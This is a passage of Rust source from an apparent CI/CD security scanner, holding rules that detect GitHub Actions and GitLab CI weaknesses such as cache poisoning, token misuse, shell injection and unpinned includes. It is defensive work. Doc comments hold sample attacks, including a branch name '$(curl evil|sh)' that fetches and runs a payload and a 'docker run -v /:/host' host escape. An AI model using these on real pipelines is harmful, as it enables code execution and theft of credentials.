4411        NodeKind::Secret => true,
4412        NodeKind::Identity => {
4413            // GITHUB_TOKEN identities are named `GITHUB_TOKEN` or
4414            // `GITHUB_TOKEN (<job>)`. Anything else is extra authority
4415            // (cloud OIDC, ADO service connection, …).
4416            !n.name.starts_with("GITHUB_TOKEN")
4417        }
4418        _ => false,
4419    });
4420
4421    let workflow_has_token_writes = graph
4422        .nodes_of_kind(NodeKind::Identity)
4423        .filter(|n| n.name.starts_with("GITHUB_TOKEN"))
4424        .any(|n| {
4425            n.metadata
4426                .get(META_PERMISSIONS)
4427                .map(|p| {
4428                    let s = p.to_lowercase();
4429                    s.contains("write") || s == "write-all"
4430                })
4431                .unwrap_or(false)
4432        });
4433
4434    if !(workflow_has_extra_secrets || workflow_has_token_writes) {
4435        return findings;
4436    }
4437
4438    for step in graph.nodes_of_kind(NodeKind::Step) {
4439        let Some(action_ref) = step.metadata.get(META_INTERACTIVE_DEBUG) else {
4440            continue;
4441        };
4442
4443        findings.push(Finding {
4444            severity: Severity::High,
4445            category: FindingCategory::InteractiveDebugActionInAuthorityWorkflow,
4446            path: None,
4447            nodes_involved: vec![step.id],
4448            message: format!(
4449                "Step '{}' uses interactive debug action '{action_ref}' inside a workflow that holds non-default secrets or write permissions — a successful debug session forwards the runner's full environment over SSH",
4450                step.name
4451            ),
4452            recommendation: Recommendation::Manual {
4453                action: "Move the debug action into a separate workflow with no secret access and `permissions: read-all`, OR gate the step on an explicit short-lived `workflow_dispatch` input that is removed after use. Never run tmate/upterm in a workflow that holds production credentials.".into(),
4454            },
4455            source: FindingSource::BuiltIn,
4456            extras: FindingExtras::default(),
4457        });
4458    }
4459
4460    findings
4461}
4462
4463/// R9 — PR-specific cache key in a default-branch consumer.
4464///
4465/// Severity: Medium. Speculative rule from the council gap report; the corpus
4466/// did not show a perfect example, so we emit Medium and document the risk.
4467/// A PR build that writes to a cache keyed on `github.head_ref` /
4468/// `github.event.pull_request.head.ref` / `github.actor` populates an entry
4469/// that a later default-branch run can restore — letting an attacker poison
4470/// the build cache from a fork PR.
4471pub fn pr_specific_cache_key_in_default_branch_consumer(graph: &AuthorityGraph) -> Vec<Finding> {
4472    let mut findings = Vec::new();
4473
4474    // Trigger gate: workflow must run on `push` (default branch) AND on a
4475    // PR-context trigger. Without the push side, the cache write never gets
4476    // restored by a privileged consumer; without the PR side, no untrusted
4477    // contributor can populate the cache to begin with.
4478    let triggers = graph.metadata.get(META_TRIGGERS);
4479    let runs_on_push = triggers_contain_any(triggers, &["push"]);
4480    let runs_on_pr = triggers_contain_any(triggers, &["pull_request", "pull_request_target"]);
4481    if !(runs_on_push && runs_on_pr) {
4482        return findings;
4483    }
4484
4485    for step in graph.nodes_of_kind(NodeKind::Step) {
4486        let Some(key) = step.metadata.get(META_CACHE_KEY) else {
4487            continue;
4488        };
4489        if key.is_empty() {
4490            continue;
4491        }
4492        // Detect PR-derived key fragments. Match common spelling variants.
4493        let lower = key.to_lowercase();
4494        let is_pr_keyed = lower.contains("github.head_ref")
4495            || lower.contains("github.event.pull_request.head.ref")
4496            || lower.contains("github.event.pull_request.head.sha")
4497            || lower.contains("github.actor")
4498            || lower.contains("github.triggering_actor");
4499        if !is_pr_keyed {
4500            continue;
4501        }
4502
4503        findings.push(Finding {
4504            severity: Severity::Medium,
4505            category: FindingCategory::PrSpecificCacheKeyInDefaultBranchConsumer,
4506            path: None,
4507            nodes_involved: vec![step.id],
4508            message: format!(
4509                "Step '{}' caches with a PR-derived key ('{key}') in a workflow that also runs on push — a fork PR can poison the cache that the default-branch build later restores",
4510                step.name
4511            ),
4512            recommendation: Recommendation::Manual {
4513                action: "Split the workflow so the `actions/cache` save side runs only on `push: branches: [main]` (or another protected ref) and PR runs use cache restore-only with `lookup-only: true`. Alternatively, key the cache on the file hashes that determine its content, not the branch or actor.".into(),
4514            },
4515            source: FindingSource::BuiltIn,
4516            extras: FindingExtras::default(),
4517        });
4518    }
4519
4520    findings
4521}
4522
4523/// R10 — `gh` / `gh api` runtime escalation with the default GITHUB_TOKEN.
4524///
4525/// Severity: Medium. Static permission checks see only the declared
4526/// `permissions:` block — they miss runtime calls that use the token to
4527/// perform write-class operations the workflow shouldn't be doing in a
4528/// PR-triggered context. Detects `gh ` invocations that mutate state
4529/// (`pr merge`, `release create/upload`, `api -X POST/PATCH/PUT/DELETE`)
4530/// in workflows triggered by `pull_request`, `issue_comment`, or
4531/// `workflow_run`.
4532pub fn gh_cli_with_default_token_escalating(graph: &AuthorityGraph) -> Vec<Finding> {
4533    let mut findings = Vec::new();
4534
4535    // Trigger gate.
4536    let triggers = graph.metadata.get(META_TRIGGERS);
4537    let risky_trigger = triggers_contain_any(
4538        triggers,
4539        &[
4540            "pull_request",
4541            "pull_request_target",
4542            "issue_comment",
4543            "workflow_run",
4544            "pull_request_review",
4545            "pull_request_review_comment",
4546        ],
4547    );
4548    if !risky_trigger {
4549        return findings;
4550    }
4551
4552    for step in graph.nodes_of_kind(NodeKind::Step) {
4553        let Some(body) = step.metadata.get(META_SCRIPT_BODY) else {
4554            continue;
4555        };
4556        if body.is_empty() {
4557            continue;
4558        }
4559        if !body_contains_gh_cli(body) {
4560            continue;
4561        }
4562        let Some(verb) = detect_gh_escalating_verb(body) else {
4563            continue;
4564        };
4565
4566        findings.push(Finding {
4567            severity: Severity::Medium,
4568            category: FindingCategory::GhCliWithDefaultTokenEscalating,
4569            path: None,
4570            nodes_involved: vec![step.id],
4571            message: format!(
4572                "Step '{}' invokes `gh {verb}` against the default GITHUB_TOKEN inside a workflow triggered by an untrusted context — runtime privilege escalation that static permission checks miss",
4573                step.name
4574            ),
4575            recommendation: Recommendation::Manual {
4576                action: "Move write-class `gh`/`gh api` calls into a separate workflow gated on `push` (or an explicit reusable workflow with `secrets: inherit` only for the writer side). On the PR-triggered side, enforce `permissions: read-all` and verify by re-reading the GitHub Actions audit log.".into(),
4577            },
4578            source: FindingSource::BuiltIn,
4579            extras: FindingExtras::default(),
4580        });
4581    }
4582
4583    findings
4584}
4585
4586/// True when `body` invokes the `gh` CLI as a command (not just mentions
4587/// the substring `gh` inside another word). Match `gh ` at start of line, after
4588/// `;`, after `&&`, after `|`, or following indentation/whitespace.
4589fn body_contains_gh_cli(body: &str) -> bool {
4590    for line in body.lines() {
4591        let trimmed = line.trim_start();
4592        if trimmed.starts_with("gh ") || trimmed.starts_with("gh\t") {
4593            return true;
4594        }
4595        // Inline forms after a shell separator.
4596        for sep in ["&& gh ", "|| gh ", "; gh ", "$(gh ", "`gh ", "| gh "] {
4597            if trimmed.contains(sep) {
4598                return true;
4599            }
4600        }
4601    }
4602    false
4603}
4604
4605/// If `body` invokes a write-class `gh` verb, return a short label for it.
4606/// Recognised:
4607///   - `gh pr merge`
4608///   - `gh release create` / `gh release upload` / `gh release delete`
4609///   - `gh api -X POST|PATCH|PUT|DELETE` (any path)
4610///   - `gh api ... <method>` against `/repos/.../{contents,releases,actions/secrets,environments}`
4611fn detect_gh_escalating_verb(body: &str) -> Option<String> {
4612    let lower = body.to_lowercase();
4613    if lower.contains("gh pr merge") {
4614        return Some("pr merge".into());
4615    }
4616    if lower.contains("gh release create") {
4617        return Some("release create".into());
4618    }
4619    if lower.contains("gh release upload") {
4620        return Some("release upload".into());
4621    }
4622    if lower.contains("gh release delete") {
4623        return Some("release delete".into());
4624    }
4625    if lower.contains("gh release edit") {
4626        return Some("release edit".into());
4627    }
4628    // `gh api -X <METHOD>` form. Match the method tokens directly so we don't
4629    // false-positive on `-X-Foo` headers etc.
4630    for method in ["post", "patch", "put", "delete"] {
4631        let needle_dash = format!("gh api -x {method}");
4632        let needle_long = format!("gh api --method {method}");
4633        if lower.contains(&needle_dash) || lower.contains(&needle_long) {
4634            return Some(format!("api -X {}", method.to_uppercase()));
4635        }
4636    }
4637    // Path-based heuristic: even without an explicit -X, certain endpoints are
4638    // mutation endpoints (`gh api repos/.../actions/secrets/FOO -F ...`).
4639    let path_markers = [
4640        "actions/secrets",
4641        "actions/variables",
4642        "/environments",
4643        "/releases",
4644    ];
4645    if lower.contains("gh api ") && path_markers.iter().any(|m| lower.contains(m)) {
4646        // Only escalate when there's also a write-flag. `-f`/`-F`/`--field`/`--input`
4647        // implies POST/PATCH semantics under `gh api`.
4648        let writes = lower.contains(" -f ")
4649            || lower.contains(" -f=")
4650            || lower.contains(" -f\"")
4651            || lower.contains(" --field")
4652            || lower.contains(" --input");
4653        if writes {
4654            return Some("api (mutation endpoint)".into());
4655        }
4656    }
4657    None
4658}
4659
4660// ── GitLab CI rules ─────────────────────────────────────────
4661
4662/// Untrusted GitLab CI predefined variables that an attacker can control by
4663/// pushing a branch / opening an MR / writing a commit message. When any of
4664/// these is interpolated into an unquoted shell expansion the runner
4665/// executes whatever the attacker put inside `` $(...) `` or backticks.
4666const UNTRUSTED_GITLAB_CI_VARS: &[&str] = &[
4667    "CI_COMMIT_BRANCH",
4668    "CI_COMMIT_REF_NAME",
4669    "CI_COMMIT_TAG",
4670    "CI_COMMIT_MESSAGE",
4671    "CI_COMMIT_TITLE",
4672    "CI_COMMIT_DESCRIPTION",
4673    "CI_COMMIT_AUTHOR",
4674    "CI_MERGE_REQUEST_TITLE",
4675    "CI_MERGE_REQUEST_DESCRIPTION",
4676    "CI_MERGE_REQUEST_SOURCE_BRANCH_NAME",
4677];
4678
4679/// Rule: `$CI_JOB_TOKEN` (the GitLab platform-injected job token, broad scope
4680/// by default — registry write, package upload, project read) used as a
4681/// bearer credential against an external HTTP endpoint, or fed to
4682/// `docker login` for `registry.gitlab.com`.
4683///
4684/// Detection: read the Step's `META_SCRIPT_BODY`. Fire when the body
4685/// contains `$CI_JOB_TOKEN` or `${CI_JOB_TOKEN}` AND any of:
4686/// - a `curl` / `wget` / `http` / `https.request` invocation, OR
4687/// - the literal `gitlab-ci-token:` (the token-as-Basic-auth idiom), OR
4688/// - a `docker login` for `registry.gitlab.com`.
4689///
4690/// Severity: High. Category: Credentials.
4691pub fn ci_job_token_to_external_api(graph: &AuthorityGraph) -> Vec<Finding> {
4692    let mut findings = Vec::new();
4693
4694    for step in graph.nodes_of_kind(NodeKind::Step) {
4695        let body = match step.metadata.get(META_SCRIPT_BODY) {
4696            Some(b) if !b.is_empty() => b,
4697            _ => continue,
4698        };
4699
4700        if !body_references_ci_job_token(body) {
4701            continue;
4702        }
4703
4704        let sink = classify_ci_job_token_sink(body);
4705        let Some(sink) = sink else {
4706            continue;
4707        };
4708
4709        findings.push(Finding {
4710            severity: Severity::High,
4711            category: FindingCategory::CiJobTokenToExternalApi,
4712            path: None,
4713            nodes_involved: vec![step.id],
4714            message: format!(
4715                "Step '{}' uses $CI_JOB_TOKEN as a bearer credential ({}) — the token's default scope (registry write, package upload, project read) means a poisoned MR job that emits it can pivot to package or registry pushes",
4716                step.name, sink
4717            ),
4718            recommendation: Recommendation::Manual {
4719                action: "Scope CI_JOB_TOKEN: in Settings → CI/CD → Job token permissions, set the inbound allowlist to the minimum projects required and disable any unused scope (package_registry, container_registry). For uploads, prefer a dedicated short-lived deploy token over CI_JOB_TOKEN. Never POST CI_JOB_TOKEN to webhooks or third-party APIs.".into(),
4720            },
4721            source: FindingSource::BuiltIn,
4722            extras: FindingExtras::default(),
4723        });
4724    }
4725
4726    findings
4727}
4728
4729fn body_references_ci_job_token(body: &str) -> bool {
4730    body.contains("$CI_JOB_TOKEN") || body.contains("${CI_JOB_TOKEN}")
4731}
4732
4733/// Classify how `$CI_JOB_TOKEN` is being used. Returns a short human-readable
4734/// sink description, or None when the token only appears in benign ways
4735/// (e.g. assignment to an env var that's never read).
4736fn classify_ci_job_token_sink(body: &str) -> Option<&'static str> {
4737    let lower = body.to_lowercase();
4738    // gitlab-ci-token:$CI_JOB_TOKEN — the canonical Basic-auth idiom.
4739    if lower.contains("gitlab-ci-token:") && body_references_ci_job_token(body) {
4740        if lower.contains("docker login") && lower.contains("registry.gitlab.com") {
4741            return Some("docker login registry.gitlab.com");
4742        }
4743        if lower.contains("curl") || lower.contains("wget") {
4744            return Some("curl/wget Basic auth (user gitlab-ci-token)");
4745        }
4746        return Some("Basic-auth credential (user gitlab-ci-token)");
4747    }
4748    // JOB-TOKEN: header form (curl/wget against /api/v4/...).
4749    if lower.contains("job-token:") && body_references_ci_job_token(body) {
4750        return Some("JOB-TOKEN header to GitLab API");
4751    }
4752    // curl --header "PRIVATE-TOKEN: $CI_JOB_TOKEN" or similar bearer use.
4753    if (lower.contains("curl") || lower.contains("wget"))
4754        && (lower.contains("authorization:") || lower.contains("private-token:"))
4755        && body_references_ci_job_token(body)
4756    {
4757        return Some("Authorization/PRIVATE-TOKEN header to HTTP endpoint");
4758    }
4759    // Generic: token appears next to a CI_API_V4_URL request — strong signal.
4760    if body.contains("CI_API_V4_URL") && body_references_ci_job_token(body) {
4761        return Some("HTTP request to ${CI_API_V4_URL} with token");
4762    }
4763    None
4764}
4765
4766/// Rule: GitLab `id_tokens:` audience reused across MR-context and
4767/// protected-context jobs in the same file (no audience separation), or set
4768/// to a wildcard / multi-cloud broker URL, or shared with a `secrets:` Vault
4769/// path that the consuming job doesn't need.
4770///
4771/// Detection: collect every OIDC Identity node (Identity with
4772/// `META_OIDC == "true"`) carrying a `META_OIDC_AUDIENCE`. For each audience:
4773/// - Wildcard / `*` audience → fire (b).
4774/// - Same audience reachable from at least one Step marked `META_TRIGGER ==
4775///   merge_request` AND at least one Step that is NOT (i.e. protected-context
4776///   only) → fire (a).
4777///
4778/// Severity: High. Category: Privilege.
4779pub fn id_token_audience_overscoped(graph: &AuthorityGraph) -> Vec<Finding> {
4780    use std::collections::HashMap as Map;
4781
4782    let mut findings = Vec::new();
4783
4784    // Collect (audience → (identity_id, [step_ids that reach it])).
4785    let mut by_aud: Map<&str, Vec<(NodeId, Vec<NodeId>)>> = Map::new();
4786
4787    for ident in graph.nodes_of_kind(NodeKind::Identity) {
4788        let is_oidc = ident.metadata.get(META_OIDC).map(String::as_str) == Some("true");
4789        if !is_oidc {
4790            continue;
4791        }
4792        let Some(aud) = ident.metadata.get(META_OIDC_AUDIENCE) else {
4793            continue;
4794        };
4795        if aud == "unknown" || aud.is_empty() {
4796            continue;
4797        }
4798
4799        // Find steps that hold this identity via HasAccessTo.
4800        let mut consumers: Vec<NodeId> = Vec::new();
4801        for step in graph.nodes_of_kind(NodeKind::Step) {
4802            let holds = graph
4803                .edges_from(step.id)
4804                .any(|e| e.kind == EdgeKind::HasAccessTo && e.to == ident.id);
4805            if holds {
4806                consumers.push(step.id);
4807            }
4808        }
4809        by_aud
4810            .entry(aud.as_str())
4811            .or_default()
4812            .push((ident.id, consumers));
4813    }
4814
4815    for (aud, entries) in &by_aud {
4816        // (b) Wildcard / suspiciously broad audience.
4817        let is_wildcard = *aud == "*"
4818            || aud.contains("/*")
4819            || aud.eq_ignore_ascii_case("any")
4820            || aud.eq_ignore_ascii_case("default");
4821        if is_wildcard {
4822            // Use the first identity node as the anchor.
4823            if let Some((ident_id, consumers)) = entries.first() {
4824                let mut nodes_involved = vec![*ident_id];
4825                nodes_involved.extend(consumers.iter().copied());
4826                findings.push(Finding {
4827                    severity: Severity::High,
4828                    category: FindingCategory::IdTokenAudienceOverscoped,
4829                    path: None,
4830                    nodes_involved,
4831                    message: format!(
4832                        "OIDC id_token audience '{aud}' is wildcard / catch-all — any cloud / Vault role bound to this audience is reachable from every job that mints the token"
4833                    ),
4834                    recommendation: Recommendation::Manual {
4835                        action: "Replace the wildcard `aud:` with a job- or environment-specific audience (e.g. `vault.gitlab.net/prod-deploy`, `aws-deploy-staging`). Bind the downstream role / Vault path to that exact audience so unrelated jobs can't trade the token for the same credential.".into(),
4836                    },
4837                    source: FindingSource::BuiltIn,
4838                    extras: FindingExtras::default(),
4839                });
4840                continue;
4841            }
4842        }
4843
4844        // (a) Same audience reachable from MR-context AND non-MR-context steps.
4845        let all_consumers: Vec<NodeId> = entries
4846            .iter()
4847            .flat_map(|(_, c)| c.iter().copied())
4848            .collect();
4849        let mut has_mr = false;
4850        let mut has_protected = false;
4851        for sid in &all_consumers {
4852            let Some(step) = graph.node(*sid) else {
4853                continue;
4854            };
4855            if step.metadata.get(META_TRIGGER).map(String::as_str) == Some("merge_request") {
4856                has_mr = true;
4857            } else {
4858                has_protected = true;
4859            }
4860        }
4861        if has_mr && has_protected && !entries.is_empty() {
4862            // Anchor at the first identity node carrying this audience.
4863            let (ident_id, _) = &entries[0];
4864            let mut nodes_involved = vec![*ident_id];
4865            nodes_involved.extend(all_consumers.iter().copied());
4866            findings.push(Finding {
4867                severity: Severity::High,
4868                category: FindingCategory::IdTokenAudienceOverscoped,
4869                path: None,
4870                nodes_involved,
4871                message: format!(
4872                    "OIDC id_token audience '{aud}' is shared across merge_request_event jobs and protected-branch jobs — a poisoned MR can mint a token with the same audience as the production deploy and trade it for the same downstream cloud / Vault role"
4873                ),
4874                recommendation: Recommendation::Manual {
4875                    action: "Split audiences by trust context: declare a separate `aud:` for MR-context jobs (e.g. `…/mr-validate`) and a different `aud:` for protected-branch jobs (e.g. `…/prod-deploy`). Bind each downstream role / Vault path to the exact audience of the job that needs it.".into(),
4876                },
4877                source: FindingSource::BuiltIn,
4878                extras: FindingExtras::default(),
4879            });
4880        }
4881    }
4882
4883    findings
4884}
4885
4886/// Rule: untrusted GitLab predefined variable interpolated unquoted into a
4887/// shell context (`script:` / `before_script:` / `after_script:` /
4888/// `environment:url:`). A branch named `` $(curl evil|sh) `` then runs as
4889/// part of the runner.
4890///
4891/// Detection: for each Step, scan `META_SCRIPT_BODY` and `META_ENVIRONMENT_URL`
4892/// for any of `UNTRUSTED_GITLAB_CI_VARS` referenced via `$VAR`, `${VAR}`, or
4893/// `"$VAR"`/`"${VAR}"` (double-quoted — still expanded). A reference inside
4894/// single quotes does NOT fire. Same for `printf %q` / `${VAR@Q}` /
4895/// `${VAR//[^A-Za-z0-9]/}` sanitised forms.
4896///
4897/// Severity: High. Category: Injection.
4898pub fn untrusted_ci_var_in_shell_interpolation(graph: &AuthorityGraph) -> Vec<Finding> {
4899    let mut findings = Vec::new();
4900
4901    for step in graph.nodes_of_kind(NodeKind::Step) {
4902        let mut hits: Vec<&str> = Vec::new();
4903        let mut where_hit: Vec<&str> = Vec::new();
4904
4905        if let Some(body) = step.metadata.get(META_SCRIPT_BODY) {
4906            for var in UNTRUSTED_GITLAB_CI_VARS {
4907                if shell_body_unsafely_expands(body, var) {
4908                    hits.push(*var);
4909                    where_hit.push("script");
4910                }
4911            }
4912        }
4913        if let Some(url) = step.metadata.get(META_ENVIRONMENT_URL) {
4914            for var in UNTRUSTED_GITLAB_CI_VARS {
4915                if url_interpolates_var(url, var) {
4916                    if !hits.contains(var) {
4917                        hits.push(*var);
4918                    }
4919                    if !where_hit.contains(&"environment.url") {
4920                        where_hit.push("environment.url");
4921                    }
4922                }
4923            }
4924        }
4925
4926        if hits.is_empty() {
4927            continue;
4928        }
4929
4930        // Dedup hit list while preserving order.
4931        let mut seen = std::collections::HashSet::new();
4932        let names: Vec<&str> = hits.into_iter().filter(|n| seen.insert(*n)).collect();
4933        let mut wh = where_hit;
4934        wh.sort();
4935        wh.dedup();
4936        let where_str = wh.join(" + ");
4937        let names_str = names.join(", ");
4938
4939        findings.push(Finding {
4940            severity: Severity::High,
4941            category: FindingCategory::UntrustedCiVarInShellInterpolation,
4942            path: None,
4943            nodes_involved: vec![step.id],
4944            message: format!(
4945                "Step '{}' interpolates attacker-controlled GitLab predefined variable(s) [{}] into {} without single-quote isolation — a branch / tag / commit message containing `$(...)` executes inside the runner",
4946                step.name, names_str, where_str
4947            ),
4948            recommendation: Recommendation::Manual {
4949                action: "Pass the untrusted value through the step's `variables:` / `env:` block (one variable per step), then reference it inside the script as `\"$BRANCH\"` (double-quoted is fine when the value is bound to a real shell variable, not YAML-interpolated). For commands that must include the value, sanitise with `printf %q` or `${VAR//[^A-Za-z0-9_-]/}` first. For `environment:url:`, never interpolate `$CI_COMMIT_*` directly — use a slug-only variable (`$CI_COMMIT_REF_SLUG` is sanitised by GitLab).".into(),
4950            },
4951            source: FindingSource::BuiltIn,
4952            extras: FindingExtras::default(),
4953        });
4954    }
4955
4956    findings
4957}
4958
4959/// Returns true if `body` contains an *unsafe* expansion of `$VAR` / `${VAR}`
4960/// — i.e. one that is NOT enclosed in single quotes and NOT obviously
4961/// sanitised. Conservative: errs on the side of flagging because the cost of
4962/// a false negative (RCE) dwarfs the cost of a false positive (one extra
4963/// review comment).
4964fn shell_body_unsafely_expands(body: &str, var: &str) -> bool {
4965    // First check that the variable appears at all.
4966    let dollar = format!("${var}");
4967    let dollar_brace = format!("${{{var}}}");
4968    if !body.contains(&dollar) && !body.contains(&dollar_brace) {
4969        return false;
4970    }
4971
4972    // Walk lines. A line that's entirely single-quoted around the var is
4973    // safe; otherwise we need to be conservative.
4974    for line in body.lines() {
4975        let line = line.trim_start_matches(['-', ' ', '\t']);
4976        if line.is_empty() || line.starts_with('#') {
4977            continue;
4978        }
4979
4980        let candidate_positions: Vec<usize> = line
4981            .match_indices(&dollar)
4982            .map(|(i, _)| i)
4983            .chain(line.match_indices(&dollar_brace).map(|(i, _)| i))
4984            .collect();
4985
4986        for pos in candidate_positions {
4987            // Reject if the var reference is wrapped in single quotes
4988            // (count single-quote occurrences strictly before `pos`; odd
4989            // count means we're inside a single-quoted region).
4990            let prefix = &line[..pos];
4991            let single_count = prefix.matches('\'').count();
4992            if single_count % 2 == 1 {
4993                continue; // inside '...'
4994            }
4995            // Reject if line has obvious sanitiser around the var.
4996            if line.contains("printf %q")
4997                || line.contains("${") && (line.contains("@Q}") || line.contains("//[^"))
4998            {
4999                // Sanitiser keyword present somewhere — be safe and skip.
5000                continue;
5001            }
5002            return true;
5003        }
5004    }
5005    false
5006}
5007
5008fn url_interpolates_var(url: &str, var: &str) -> bool {
5009    let dollar = format!("${var}");
5010    let dollar_brace = format!("${{{var}}}");
5011    url.contains(&dollar) || url.contains(&dollar_brace)
5012}
5013
5014// ── GitLab CI rules ─────────────────────────────────────
5015//
5016// Five rules sourced from the v0.9.0 GitLab corpus gap analysis (council
5017// review of 277 .gitlab-ci.yml files). Detection inputs come from metadata
5018// stamped by `taudit-parse-gitlab` — see `META_GITLAB_*` constants. Each rule
5019// is a no-op on graphs from non-GitLab parsers (the markers will simply be
5020// absent), so wiring all five into `run_all_rules` is safe.
5021
5022/// Mutable branch names used as `ref:` on includes — anyone with push to one
5023/// of these on the source repo can backdoor every consumer's pipeline.
5024const MUTABLE_BRANCH_REFS: &[&str] = &[
5025    "main", "master", "develop", "dev", "trunk", "default", "HEAD",
5026];
5027
5028/// Mid-string fragments inside a `remote:` URL that betray a branch ref
5029/// (vs a tag or sha). GitLab raw URLs use `/-/raw/<ref>/<path>`.
5030fn remote_url_uses_branch(url: &str) -> Option<String> {
5031    // Look for `/-/raw/<ref>/` patterns; ref is the segment after `/-/raw/`.
5032    let idx = url.find("/-/raw/")?;
5033    let after = &url[idx + "/-/raw/".len()..];
5034    let ref_seg = after.split('/').next()?;
5035    if ref_seg.is_empty() {
5036        return None;
5037    }
5038    // Tags / SHAs aren't mutable: a 40-hex string is a sha; a `v\d+...` or
5039    // contains `.` and digits is a tag-ish convention. Branches are everything else.
5040    if ref_seg.len() == 40 && ref_seg.chars().all(|c| c.is_ascii_hexdigit()) {
5041        return None;
5042    }
5043    if ref_seg.starts_with('v')
5044        && ref_seg
5045            .chars()
5046            .nth(1)
5047            .map(|c| c.is_ascii_digit())
5048            .unwrap_or(false)
5049    {
5050        return None;
5051    }
5052    Some(ref_seg.to_string())
5053}
5054
5055/// Rule: `unpinned_include_remote_or_branch_ref` (High, Supply Chain).
5056///
5057/// Top-level GitLab `include:` of a `remote:` URL pinned to a branch, a
5058/// `project:` whose `ref:` is a mutable branch (main/master/develop/...), or
5059/// an include with no `ref:` at all (defaults to HEAD on the source repo).
5060///
5061/// Skips `local:` includes (same repo — same trust boundary), `template:`
5062/// includes (GitLab-maintained), and `component:` includes that have an `@`
5063/// version pin. Reads the structured `META_GITLAB_INCLUDES` blob the parser
5064/// stamps on the graph.
5065pub fn unpinned_include_remote_or_branch_ref(graph: &AuthorityGraph) -> Vec<Finding> {
5066    use taudit_parse_gitlab_include_view::IncludeView;
5067
5068    let blob = match graph.metadata.get(META_GITLAB_INCLUDES) {
5069        Some(s) => s,
5070        None => return Vec::new(),
5071    };
5072    let entries: Vec<IncludeView> = match serde_json::from_str(blob) {
5073        Ok(e) => e,
5074        Err(_) => return Vec::new(),
5075    };
5076
5077    let mut findings = Vec::new();
5078
5079    for entry in entries {
5080        let kind = entry.kind.as_str();
5081        let target = entry.target.as_str();
5082        let git_ref = entry.git_ref.as_str();
5083
5084        match kind {
5085            // local / template / component — skip (or handled separately for
5086            // unversioned components).
5087            "local" | "template" => continue,
5088            "component" => {
5089                if git_ref.is_empty() {
5090                    findings.push(Finding {
5091                        severity: Severity::High,
5092                        category: FindingCategory::UnpinnedIncludeRemoteOrBranchRef,
5093                        path: None,
5094                        nodes_involved: vec![],
5095                        message: format!(
5096                            "include: component '{target}' has no version pin (no '@<version>') — owner of the component repo can rewrite every consumer's pipeline silently"
5097                        ),
5098                        recommendation: Recommendation::PinAction {
5099                            current: target.to_string(),
5100                            pinned: format!("{target}@<sha-or-tag>"),
5101                        },
5102                        source: FindingSource::BuiltIn,
5103                        extras: FindingExtras::default(),
5104                    });
5105                }
5106            }
5107            "remote" => {
5108                if let Some(branch) = remote_url_uses_branch(target) {
5109                    findings.push(Finding {
5110                        severity: Severity::High,
5111                        category: FindingCategory::UnpinnedIncludeRemoteOrBranchRef,
5112                        path: None,
5113                        nodes_involved: vec![],
5114                        message: format!(
5115                            "include: remote URL pins branch '{branch}' ({target}) — included YAML executes with consumer's CI_JOB_TOKEN and secrets; whoever controls that branch can backdoor this pipeline"
5116                        ),
5117                        recommendation: Recommendation::PinAction {
5118                            current: target.to_string(),
5119                            pinned: target.replacen(
5120                                &format!("/-/raw/{branch}/"),
5121                                "/-/raw/<full-sha>/",
5122                                1,
5123                            ),
5124                        },
5125                        source: FindingSource::BuiltIn,
5126                        extras: FindingExtras::default(),
5127                    });
5128                }
5129            }
5130            "project" => {
5131                let lower = git_ref.to_ascii_lowercase();
5132                let is_branch = MUTABLE_BRANCH_REFS
5133                    .iter()
5134                    .any(|b| b.eq_ignore_ascii_case(&lower));
5135                let missing = git_ref.is_empty();
5136                let is_sha = git_ref.len() == 40 && git_ref.chars().all(|c| c.is_ascii_hexdigit());
5137                if (missing || is_branch) && !is_sha {
5138                    let why = if missing {
5139                        "no `ref:` (defaults to HEAD on source project)".to_string()
5140                    } else {
5141                        format!("`ref: {git_ref}` is a mutable branch")
5142                    };
5143                    findings.push(Finding {
5144                        severity: Severity::High,
5145                        category: FindingCategory::UnpinnedIncludeRemoteOrBranchRef,
5146                        path: None,
5147                        nodes_involved: vec![],
5148                        message: format!(
5149                            "include: project '{target}' — {why}; included YAML can redefine every job's `script:` and runs with consumer's secrets"
5150                        ),
5151                        recommendation: Recommendation::PinAction {
5152                            current: format!(
5153                                "project: {target}{}",
5154                                if missing {
5155                                    String::new()
5156                                } else {
5157                                    format!(", ref: {git_ref}")
5158                                }
5159                            ),
5160                            pinned: format!("project: {target}, ref: <full-commit-sha>"),
5161                        },
5162                        source: FindingSource::BuiltIn,
5163                        extras: FindingExtras::default(),
5164                    });
5165                }
5166            }
5167            _ => {}
5168        }
5169    }
5170
5171    findings
5172}
5173
5174/// Rule: `dind_service_grants_host_authority` (High, Privilege).
5175///
5176/// A GitLab job that declares a `services: [docker:*-dind]` sidecar AND
5177/// holds at least one secret (other than the implicit, structurally-present
5178/// CI_JOB_TOKEN). The dind sidecar exposes the full Docker socket inside
5179/// the job container, so a malicious build step can `docker run -v /:/host`
5180/// and read the runner host filesystem.
5181pub fn dind_service_grants_host_authority(graph: &AuthorityGraph) -> Vec<Finding> {
5182    let mut findings = Vec::new();
5183
5184    for step in graph.nodes_of_kind(NodeKind::Step) {
5185        let has_dind = step
5186            .metadata
5187            .get(META_GITLAB_DIND_SERVICE)
5188            .map(|v| v == "true")
5189            .unwrap_or(false);
5190        if !has_dind {
5191            continue;
5192        }
5193
5194        // Walk this step's HasAccessTo edges for secrets / non-implicit
5195        // identities. The implicit CI_JOB_TOKEN does not count — every job
5196        // has it by platform design, so flagging on it would emit noise on
5197        // every dind job.
5198        let mut sensitive: Vec<String> = Vec::new();
5199        for edge in graph.edges_from(step.id) {
5200            if edge.kind != EdgeKind::HasAccessTo {
5201                continue;
5202            }
5203            let target = match graph.node(edge.to) {
5204                Some(n) => n,
5205                None => continue,
5206            };
5207            let is_implicit = target
5208                .metadata
5209                .get(META_IMPLICIT)
5210                .map(|v| v == "true")
5211                .unwrap_or(false);
5212            if is_implicit {
5213                continue;
5214            }
5215            match target.kind {
5216                NodeKind::Secret => sensitive.push(target.name.clone()),
5217                NodeKind::Identity => sensitive.push(target.name.clone()),
5218                _ => {}
5219            }
5220        }
5221
5222        if sensitive.is_empty() {
5223            continue;
5224        }
5225
5226        sensitive.sort();
5227        sensitive.dedup();
5228        // Cap the message length — corpora include jobs with dozens of vars.
5229        let preview = if sensitive.len() > 4 {
5230            format!(
5231                "{} (and {} more)",
5232                sensitive[..4].join(", "),
5233                sensitive.len() - 4
5234            )
5235        } else {
5236            sensitive.join(", ")
5237        };
5238
5239        findings.push(Finding {
5240            severity: Severity::High,
5241            category: FindingCategory::DindServiceGrantsHostAuthority,
5242            path: None,
5243            nodes_involved: vec![step.id],
5244            message: format!(
